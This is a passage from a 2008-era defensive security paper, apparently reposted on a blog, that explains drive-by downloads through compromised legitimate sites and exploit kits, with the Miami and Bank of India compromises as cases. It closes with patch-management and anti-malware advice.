Activity online, but more recently, hackers have compromised
legitimate Web sites and planted redirect code that silently
launches attacks via the browser.
One high-profile web site compromise in 2007 provides a
glimpse into how drive-by downloads are launched against
computer users. In the weeks leading up to the NFL Super
Bowl game, Miami
rigged with a snippet of JavaScript code.
A visitor to that site with an unpatched Windows machine was
silently connected to a remote third-party that attempted to
exploit known vulnerabilities described by Microsoft’s MS06-
014 and MS07-004 security bulletins. If an exploit was successful,
a Trojan was silently installed that gave the attacker full access
to the compromised computer. The attackers could later
take advantage of the compromised computer in order to steal
confidential information or to launch denial-of-service attacks.
Later in 2007, the high-traffic “Bank of India” web site was
hijacked by hackers in a sophisticated attack that used multiple
redirects to send Windows users to a server hosting an
e-mail worm file, two stealth rootkits, two Trojan downloaders,
and three backdoor Trojans. The Bank of India compromise
combined JavaScript obfuscation, multiple iFrame redirect
hops, and fast-flux techniques to avoid detection and to keep
malicious servers online during the attack. This image shows
a screenshot of the compromised Bank of India site with the
malicious script used to launch the drive-by download attack.
These are just two examples to highlight the extent of the
problem on legitimate web sites. According to data from
ScanSafe, a company that tracks web-based malware threats,
74 percent of all malware spotted in the third quarter of 2008
came from visits to compromised web sites.
Attackers also are known to have used poisoned third-party
advertising servers to redirect Windows users to rogue servers
that are hosting drive-by downloads. These malicious
ads (malvertisements) are typically Flash-based and exploit
unpatched desktop applications.
Drive-By Download Engines
Malware exploit kits serve as the engine for drive-by downloads.
These kits are professionally written software components
that can be hosted on a server with a database backend.
The kits, which are sold on underground hacker sites, are fitted
with exploits for vulnerabilities in a range of widely deployed
desktop applications, including Apple’s QuickTime media
player, Adobe Flash Player, Adobe Reader, RealNetworks’ Real-
Player and WinZip.
Browser-specific exploits have also been used, targeting
Microsoft’s Internet Explorer, Mozilla’s Firefox, Apple Safari, and
Opera. Several targeted exploit kits are fitted only with attack
code for Adobe PDF vulnerabilities or known flaws in ActiveX
controls.
Identity thieves and other malware authors purchase exploit
kits and deploy them on a malicious server. Code to redirect
traffic to that malicious server is then embedded on web sites,
and lures to those sites are spammed via e-mail or bulletin
boards.
An exploit kit server can use HTTP request headers from a
browser visit to determine the visitor’s browser type and
version as well as the underlying operating system. Once the
target operating system is fingerprinted, the exploit kit can
determine which exploits to fire.
In some cases, several exploits can be sent at the same time,
attempting to compromise a machine via third-party application
vulnerabilities. Some of the more sophisticated exploit
kits are well maintained and updated with software exploits
on a monthly basis. The kits come with a well-designed user
interface that stores detailed data about successful attacks.
The data can range from operating system versions exploited,
the target’s country of origin, which exploit was used, and the
efficiency of exploits based on traffic to the malicious site.
WHEN LEGITIMATE SITES THREATEN YOUR NETWORK Page 2
The Unpatched Desktop
The drive-by download epidemic is largely attributed to the
unpatched state of the Windows ecosystem. With very few
exceptions, the exploits in circulation target software vulnerabilities
that are known – and for which patches are available.
However, for a variety of reasons, end users are slow to apply
the necessary software fixes.
Microsoft’s Automatic Updates mechanism offers end
users a valuable way to keep operating system vulnerabilities
patched, but the same cannot be said for third-party desktop
applications. Secunia, a company that tracks software vulnerabilities,
estimates that about one-third of all deployed desktop
applications are vulnerable to a known (patched) security
issue.
The most practical approach to defending against drive-by
downloads is to pay close attention to the patch-management
component of defense. Specifically, users should;
• Use a patch management solution that assists with
finding – and fixing – all third-party desktop applications.
Secunia offers two tools – Personal Software
Inspector and Network Security Inspector – that can
help identify unpatched applications.
• Use a desktop browser that includes anti-phishing and
anti-malware blockers. Microsoft’s Internet Explorer,
Mozilla Firefox, and Opera all provide security features
to block malicious sites.
WHEN LEGITIMATE SITES THREATEN YOUR NETWORK Page 3
• Enable a firewall and apply all Microsoft operating
system updates. Avoid using pirated software which
has its updates disabled through WGA.
• Install anti-virus/anti-malware software and be sure to
keep its databases updated. Make sure your anti-virus
provider is using a browser traffic scanner to help
pinpoint potential problems from drive-by downloads.
No comments:
Post a Comment